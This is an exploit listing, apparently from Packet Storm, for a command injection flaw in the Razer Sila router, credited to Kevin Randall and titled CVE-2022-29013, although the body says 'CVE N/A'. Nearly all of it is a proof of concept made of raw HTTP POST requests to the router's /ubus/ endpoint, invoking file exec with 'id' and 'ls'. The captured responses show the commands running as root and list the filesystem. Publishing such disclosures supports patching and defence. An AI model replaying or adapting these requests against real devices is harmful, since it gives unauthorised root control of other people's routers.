CVE-2022-29013: Razer Sila 2.0.418 Command Injection ≈ Packet Storm

# Exploit Title: Razer Sila - Command Injection# Google Dork: N/A# Date: 4/9/2022# Exploit Author: Kevin Randall# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila# Version: RazerSila-2.0.441_api-2.0.418# Tested on: Razer Sila Router# CVE N/A# Proof of Concept# RequestPOST /ubus/ HTTP/1.1Host: 192.168.8.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 117Origin: https://192.168.8.1Referer: https://192.168.8.1/Te: trailersConnection: close{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}# ResponseHTTP/1.1 200 OKConnection: closeContent-Type: application/jsonContent-Length: 85{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]}# RequestPOST /ubus/ HTTP/1.1Host: 192.168.8.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 117Origin: https://192.168.8.1Referer: https://192.168.8.1/Te: trailersConnection: close{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]}# ResponseHTTP/1.1 200 OKConnection: closeContent-Type: application/jsonContent-Length: 172{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}